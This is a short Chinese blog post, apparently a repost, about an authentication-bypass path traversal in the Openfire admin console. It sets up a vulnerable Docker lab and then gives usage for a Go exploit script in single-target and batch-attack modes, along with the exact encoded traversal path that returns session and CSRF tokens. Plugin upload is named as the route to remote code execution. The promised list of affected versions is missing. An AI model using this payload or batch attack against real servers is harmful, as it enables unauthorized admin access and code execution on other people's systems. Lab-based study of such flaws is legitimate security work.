本文共 1166 字,大约阅读时间需要 3 分钟。
Openfire是一款基于XMPP协议的实时协作服务器,采用Java编程语言开发,具有免费开放源代码的特点。其安装部署简单,通过Web界面管理,单台服务器可支持数万并发用户。由于其高性能和易用性,Openfire在实时通讯领域具有重要地位。
Openfire的管理控制台采用Web应用程序设计。研究人员发现,控制台存在路径遍历漏洞,未经身份验证的用户可绕过权限校验,访问管理控制台后台页面。更严重的是,后台支持安装插件功能,攻击者可通过安装恶意插件实现远程代码执行。
该漏洞影响Openfire版本范围如下:
为研究漏洞生态,推荐使用Docker搭建Openfire 4.7.4版本漏洞环境。操作步骤如下:
docker pull nasqueron/openfire:4.7.4
docker run --name openfire -d --restart=always \ --publish 9090:9090 --publish 5222:5222 --publish 7777:7777 \ --volume /srv/docker/openfire:/var/lib/openfire \ nasqueron/openfire:4.7.4
使用Go脚本进行单URL攻击:
go run main.go -u http://openfire.com:9090
批量攻击:
go run main.go -l url.txt -t 20
访问路径:
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
成功访问可获取JSSESSIONID和csrftoken。
https://github.com/igniterealtime/Openfire/releases
转载地址:http://uzpfk.baihongyu.com/